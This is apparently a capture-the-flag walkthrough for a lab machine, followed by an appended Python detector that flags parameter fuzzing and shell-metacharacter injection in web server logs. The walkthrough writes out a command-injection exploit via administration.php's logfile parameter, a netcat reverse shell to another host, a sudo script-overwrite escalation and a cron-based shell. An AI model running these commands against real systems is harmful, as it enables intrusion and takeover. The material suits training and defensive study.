Machines can be downloaded here.
Scan the ports with Nmap.
Scan for files and folders with Gobuster.
Visit the main page; it shows a chat window.
Visit chat.txt; the chat history is stored there.
Visit administration.php; it returns an error.
administration.php probably expects some parameter.
wfuzz -w /usr/share/wfuzz/wordlist/general/common.txt 'http://192.168.56.56:8080/administration.php?FUZZ=test'
Exclude responses that are 65 characters long.
wfuzz -w /usr/share/wfuzz/wordlist/general/common.txt --hh 65 'http://192.168.56.56:8080/administration.php?FUZZ=test'
curl http://192.168.56.56:8080/administration.php\?logfile\=administration.php\;id
Check chat.txt.
There is RCE. Now get a reverse shell.
curl http://192.168.56.56:8080/administration.php\?logfile\=administration.php\;nc%20192.168.56.100%201234%20-e%20/bin/bash
sudo -l
cat /var/www/html/start.sh
echo bash >/var/www/html/start.sh
sudo -u julia /bin/bash /var/www/html/start.sh
Check the crontab.
Add reverse shell code to check.sh and wait.
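From the defender's side, both the parameter fuzzing and the logfile command injection against administration.php leave traces in the web server's access log. The following Python detector is an added example, not part of the original walkthrough; the Apache combined log format, the constructed sample lines, the parameter names other than logfile and the threshold of 3 are assumptions.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, unquote_plus

# Client address and request target from an Apache combined-format line (assumed format).
LINE = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Shell metacharacters that should never appear in a file-name style parameter.
SHELL_META = re.compile(r"[;|&`$<>\r\n]")

def parse(line):
    """Return (client, path, [(name, decoded_value)]) or None for unparsable lines."""
    m = LINE.match(line)
    if not m:
        return None
    url = urlsplit(m.group(2))
    params = []
    for pair in filter(None, url.query.split("&")):
        name, _, value = pair.partition("=")
        params.append((unquote_plus(name), unquote_plus(value)))
    return m.group(1), url.path, params

def injection_hits(lines):
    """Requests whose decoded parameter values carry shell metacharacters."""
    hits = []
    for rec in filter(None, map(parse, lines)):
        client, path, params = rec
        hits += [(client, path, n, v) for n, v in params if SHELL_META.search(v)]
    return hits

def fuzzing_clients(lines, threshold=3):
    """(client, path) pairs where one client tried >= threshold distinct parameter names."""
    seen = defaultdict(set)
    for rec in filter(None, map(parse, lines)):
        client, path, params = rec
        seen[(client, path)].update(n for n, _ in params)
    return sorted(k for k, names in seen.items() if len(names) >= threshold)

# Constructed sample lines (not captured from the target); sizes and timestamps are made up.
SAMPLE = [
    '192.168.56.100 - - [01/Jan/2024:10:00:00 +0000] "GET /administration.php?admin=test HTTP/1.1" 200 65',
    '192.168.56.100 - - [01/Jan/2024:10:00:00 +0000] "GET /administration.php?backup=test HTTP/1.1" 200 65',
    '192.168.56.100 - - [01/Jan/2024:10:00:01 +0000] "GET /administration.php?logfile=test HTTP/1.1" 200 120',
    '192.168.56.100 - - [01/Jan/2024:10:02:00 +0000] "GET /administration.php?logfile=administration.php;id HTTP/1.1" 200 140',
    '192.168.56.1 - - [01/Jan/2024:10:03:00 +0000] "GET /chat.txt HTTP/1.1" 200 512',
]

if __name__ == "__main__":
    print(injection_hits(SAMPLE))
    print(fuzzing_clients(SAMPLE))
```

Values are URL-decoded before matching, so encoded metacharacters such as %3B are caught as well as the literal ; used here.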